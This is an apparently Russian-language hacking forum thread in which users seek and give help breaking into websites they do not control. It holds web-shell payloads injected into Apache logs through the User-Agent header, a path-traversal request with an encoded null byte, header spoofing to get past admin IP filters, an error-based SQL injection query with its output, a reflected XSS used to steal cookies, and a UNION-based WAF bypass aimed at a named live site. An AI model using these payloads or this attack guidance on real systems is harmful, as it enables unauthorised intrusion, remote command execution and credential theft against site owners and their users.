Ваши вопросы по уязвимостям.

IP фильтруется в httpd.conf, X-Forwarded-For в этом случае может помочь? и можно подробнее о нем, а то что-то я не очень понимаю как правильно нужно его использовать.
Как проверить скачивается или выполняется?

Phpmyadmin если где-то и есть, то я не нашел его, хотя просканил на папки все, короче в явном виде не доступен.

 

Некоторые скрипты верят X-Forwarded-For, и можно передать хидер:
X-Forwarded-For: 1.1.1.1
Или(если установлен какой-то модуль, название не помню):
X-Real-IP: 1.1.1.1
Где 1.1.1.1 это айпи админа.

Code:

Как проверить скачивается или выполняется?

Например ../../var/www/index.php, тебе скачивается файл index.php, в нем есть "<? ?>" ? Или html-код главный страницы?

 

попробовал include в логи apache на тестовом сервере (параметр user-agent). Действительно в логи записалась строчка 10.200.16.52 - - [15/Jul/2012:18:53:50 +0400] "GET /shell2/ HTTP/1.1" 200 54855 "-" <?php eval($_GET[cmd]); ?>, захожу через браузер в http://testsite.comf/shell2/access_log?cmd=phpinfo(); а apache php-скрипт по ходу не отрабатывает, а вываливает содержание лога(то есть в виде текста).
Может быть я что-то не так сделал?

 

мб файлы не инклюдяться, а просто выводиться содержимое?

 

в смысле не инклудяться?в логе же появляется php-скрипт, ток вот через браузер он не выполняется, а просто показывается содержимое лога, включая php-код. Если изменить файл лога на файл с расширением .php php-скрипт отрабатывается.
Но это я на тестовом сервере могу сделать(переименовать файл), а на удаленном не получится. Там access_log как был так и останется, как же php-скрипт внутри логов исполнить???

 

Увы это не прокатывает, так как фильтрация идет Апачем

Ааа в этом плане, нет скачиваются именно исходники, не выполненные, соответственно можно посмотреть все исходники и настройки сервака и.т.д но проблема в том, что узнать то все это можно, но войти с этими данными никуда нельзя из-за фильтрации админок по IP,
- порты тоже все прикрыты кроме 80 и 443
- соседних сайтов тоже никаких нет, на серваке только один портал
- сервисов каких либо тоже нет больше

 

В продолжение:
нашел такой скрипт со следующим содержанием
private $prepared_queries = null;
private $db;

private function __construct($name)
{
$config = BebopConfig::getInstance();
$cfg_root = 'db.'.$name.'.';
$this->prepared_queries = array();

$this->db = new PDO(
$config->getVar($cfg_root.'dbtype').':'.$config->getVar($cfg_root.'dsn'),
$config->getVar($cfg_root.'user'),
$config->getVar($cfg_root.'password')
);
$this->db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$this->db->setAttribute(PDO::MYSQL_ATTR_USE_BUFFERED_QUERY, 1);
$this->db->exec("SET NAMES utf8");
}

public static function getInstance($name = 'live')
{
if (!array_key_exists($name, self::$instances)) {
self::$instances[$name] = new PDO_Singleton($name);

ника не могу определить имя файла, в котором предположительно настройки для подключения к БД хранятся, я так понимаю имя файл начинается с new PDO

 

на сайт в логи apache засунул через User-agent
<?php echo '<form><input name="cmd" /></form>'; if(isset($_GET['cmd'])) system($_GET['cmd']); ?>
Захожу http://site.com/attachment/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fvar%252Flog%252Fapache2%252Fsite.ru_custom.log%2500.jpg
и вижу содержимое лог файла включая
91.221.56.225 - - [15/Jul/2012:21:47:24 +0400] "GET / HTTP/1.1" 200 64697 "-" "<?php echo '<form><input name=\"cmd\" /></form>'; if(isset($_GET['cmd'])) system($_GET['cmd']); ?>"
Но php-получается не исполняется. Что делать?

 

gateout
Нет PDO расширение для php, интерфейс для доступа с различным базам данных

 

gateout
>new PDO
Это создание нового объекта. Смотри функцию getVar.
>php-получается не исполняется
Уверен, что у тебя инклуд, а не обычное чтение файлов?

 

в модуле блогов на phpbb нашел xss(пасивку), но почему-то кроме настроек чата и phpsession больше ничего на сниффер не приходит.

вот сама xss

 

Ты спалил URL

Я тоже попробывал проинклюдить логи, но там не инклюд, а читалка. Теперь читай конфиги => phpmyadmin => пароль админа => admin.твой_сайт.ru.

 

Да, я понял, что не include (к сожалению поздновато). посмотрю по поводу phpMyadmin. Подправил сообщение с сайтом)промашка вышла, спасибо.

 

Подскажите что можно сделать при найденном sql выдало ошибку:

Code:

Script: /index.php 
Line: 138 
Error(1062):Duplicate entry '4CuiUaxdwIo1' for key 'group_key' 
in query: UPDATE mod_offers SET count_out=(count_out+1) WHERE id=''and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(105),CHAR(85),CHAR(97),CHAR(120),CHAR(100),CHAR(119),CHAR(73),CHAR(111)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'' 

 

Взломать!

 

Доработать скрипт, поставить фильтрации, сделать какую нить систему логов которая при ошибках админу давала знать о выявленых ошибках, смотря с какой стороны тут посмотреть)))

 

phpmyadmin на сайте не оказалось, насколько я понял. Нашел параметры подключения к БД, но логины/ пароли цепляются из БД. подскажите, куда дальше двигаться?
то есть исходные данные:
1) есть читалка, то есть могу прочитать данный из файлов на сервере.
2) есть phpinfo
3) есть параметры подключения к БД,
как продолжить атаку?

 

Читай сорцы двига, ищи еще баги

 

Не могу обойти WAF...

- OK но не выводит

- 403

- OK но не выводит

Вопрос: как обойти?

 

http://www.tpsftz.org/page.php?programmes&cat=5&subcat=1'+union%23%0aselect+1,2,3,4,5,6,7,8,9,10,11,12,13--+f

там string, кавычку не убирай.